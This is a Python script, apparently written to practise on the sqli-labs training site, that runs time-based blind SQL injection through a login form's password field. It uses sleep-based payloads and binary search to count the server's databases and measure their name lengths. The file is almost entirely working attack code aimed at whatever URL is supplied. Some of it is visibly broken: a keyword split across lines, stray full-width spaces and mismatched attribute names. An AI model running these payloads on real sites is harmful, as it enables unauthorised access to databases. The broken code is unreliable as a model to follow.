import requests
import sys
import time
import pdb
class Injection():
    def __init__(self):
        self.url = ""
        #self.scheNum=0
        self.scheNum=7
        self.scheLen = []
        self.headers = {
                "Content-Type":"application/x-www-form-urlencoded"
        }
    def InjectionSchemaNumber(self):  #查数据库的数量
        high = 30
        low = 1
        mid = (low + high) // 2
        while high > low:
            payload = f"1' or if((select count(schema_name) from information_schema.schemata)>{mid},sle
ep(5),0)-- +"       #查库名
            data = {
                "uname":"admin",
                "passwd":payload,
                "submit":"Submit"
            }        
            last = int(time.time())
            try:
                res = requests.post(self.url, data = data)
            except Exception as e:
                print(e) 
            finally:
                now = int(time.time())
            if now - last >5 :    
                low = mid
            else :
                high = mid
            mid = (low + high) // 2
            if mid==low and high-low==1:
                #print("The Number of schema is {}".format(high))
                self.schemataNum=high
                #break
                return
        #print(low,mid)
        self.schemataNum=mid
    def Usage(self):  #脚本的使用方法
        if len(sys.argv)!=2:
            print('The number of parameter number not right')
            print('Usage:python3 %s url '% sys.argv[0])
            print("Example:python3 postInjection.py http://192.168.62.249/login.php username=admin&password=admin password")
            sys.exit(-1)
        self.url = sys.argv[1] 
    def schemataLength(self): #查各个数据库的长度
        #pdb.set_trace()
        for i in range(self.scheNum):
            high = 30
            low = 1
            mid = (low + high) // 2
            flag=0
            while high > low:
                print(high,low,mid,end=" ")
　　　　　　　　#解释一下为啥sleep(1),后边判断延时now - last >5.因为我使用sqli-lib的13关测试时，sleep(1)的now-last>13s.
                payload = f"1' or if((select length(schema_name) from information_schema.schemata limit {i},1)>{mid},sleep(2),0)#"       #查库名
                data = {
                    "uname":"admin",
                    "passwd":payload,
                    "submit":"Submit"
                }        
                last = int(time.time())
                try:
                    res = requests.post(self.url,headers=self.headers,data = data)
                except Exception as e:
                    print(e)
                finally:
                    now = int(time.time())
                #pdb.set_trace()
                print(now-last)
                if now - last >5 :    
                    low = mid
                else :
                    high = mid
                mid = (low + high) // 2 
                if mid==low and high-low==1:
                    self.scheLen.append(high)
                    flag=1
                    break
            if flag==1:
                continue
            self.scheLen.append(mid)
            



if __name__ == '__main__':
#    pdb.set_trace()
    inject = Injection()
    inject.Usage()
    inject.InjectionSchemaNumber()
    print(inject.schemataNum)